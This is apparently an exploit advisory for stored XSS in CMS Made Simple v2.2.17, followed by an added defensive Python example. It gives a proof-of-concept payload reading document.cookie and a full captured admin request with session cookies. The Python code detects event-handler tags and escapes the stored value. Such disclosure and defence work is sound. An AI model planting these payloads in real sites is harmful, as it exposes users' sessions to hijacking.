
CMS Made Simple v2.2.17 - Stored Cross-Site Scripting (XSS)

# Exploit Title: CMS Made Simple v2.2.17 - Stored Cross-Site Scripting (XSS)
# Application: CMS Made Simple
# Version: v2.2.17
# Bug: Stored XSS
# Technology: PHP
# Vendor URL: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Date: 12-07-2023
# Author: Mirabbas Ağalarov
# Tested On: Linux
2. Technical Details / POC
====================================================
Steps:
1. Log in to an account.
2. Go to Content Manager.
3. Add new content.
4. Type `<img src=x onerror=alert(document.cookie)>` into the Metadata section.
   PAYLOAD: <img src=x onerror=alert(document.cookie)>
5. Submit the content.
6. Visit the content (http://localhost/index.php?page=test); the Metadata value is rendered into the page unescaped and the script executes.
Request:
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 584
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cmsSessID852A6E69CA02=G13P5UCAJC0V5TKER6IFDCASO5; 34A3083B62A2225EFA0BC6B5B433335D2226264C2C1=24F612918EB1C1E085BED5CAB82F2A786F45D5C%3A%3AEYJ1AWQIOJESINVZZXJUYW1LIJOIYWRTAW4ILCJLZMZFDWLKIjpudwxslcjlzmzfdxnlcm5hbwuiom51bgwsimhhc2gioiikmnkkmtaklndymkffznc4wtjlcwhhqvj2lndzt1fvy09htzmzevlnyzvdu1v5nnfrqkxkexjzjznuozstyifq%3D%3D; __c=5c64b42fb42c1d6bba6
Connection: close

mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1
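The captured request above shows where the stored payload enters: the `metadata` form field of the content editor. The following is an added example (not code from the advisory or from CMS Made Simple) of how a defender can review such a request and how the affected output should be handled: it URL-decodes the form body, flags watched fields whose value contains an HTML tag carrying an `on*` event-handler attribute, and shows that HTML-escaping the value on output neutralizes it. The sample body is constructed to mirror the advisory's field names (with a placeholder CSRF token), and the set of fields being watched is an assumption about which values reach the rendered page.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample body modelled on the advisory's captured POST
# (placeholder token; not the page's exact bytes).
SAMPLE_BODY = (
    "mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0"
    "&__c=PLACEHOLDER_CSRF_TOKEN"
    "&m1_content_id=0&m1_content_type=content&title=test"
    "&content_en=%3Cp%3Etest%3C%2Fp%3E"
    "&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E"
    "&alias=&active=1&m1_apply=1"
)

# An HTML tag that carries an event-handler attribute (onerror=, onload=, ...).
EVENT_HANDLER = re.compile(r"<[^>]*\bon[a-z]+\s*=", re.IGNORECASE)

# Assumed set of editor fields whose values are rendered into the public page.
WATCHED_FIELDS = ("metadata", "content_en", "title")


def decode_form(body: str) -> dict[str, list[str]]:
    """URL-decode an application/x-www-form-urlencoded body into field -> values."""
    return parse_qs(body, keep_blank_values=True)


def find_suspicious_fields(body: str) -> list[str]:
    """Return the watched field names whose decoded value contains an event-handler tag."""
    hits = []
    for name, values in decode_form(body).items():
        if name not in WATCHED_FIELDS:
            continue
        if any(EVENT_HANDLER.search(v) for v in values):
            hits.append(name)
    return hits


def escape_for_html(value: str) -> str:
    """Output encoding a template should apply before embedding a stored value in HTML."""
    return html.escape(value, quote=True)


def is_neutralized(value: str) -> bool:
    """True if the escaped form of the value no longer contains an active tag."""
    return EVENT_HANDLER.search(escape_for_html(value)) is None


if __name__ == "__main__":
    print("flagged fields:", find_suspicious_fields(SAMPLE_BODY))
    raw = decode_form(SAMPLE_BODY)["metadata"][0]
    print("stored value :", raw)
    print("escaped      :", escape_for_html(raw))
```

Run as a script it prints the flagged field and the escaped form of its value; the same `find_suspicious_fields` check can be run over request logs from the admin interface to spot stored-XSS attempts, while `escape_for_html` is the shape of the fix on the output side.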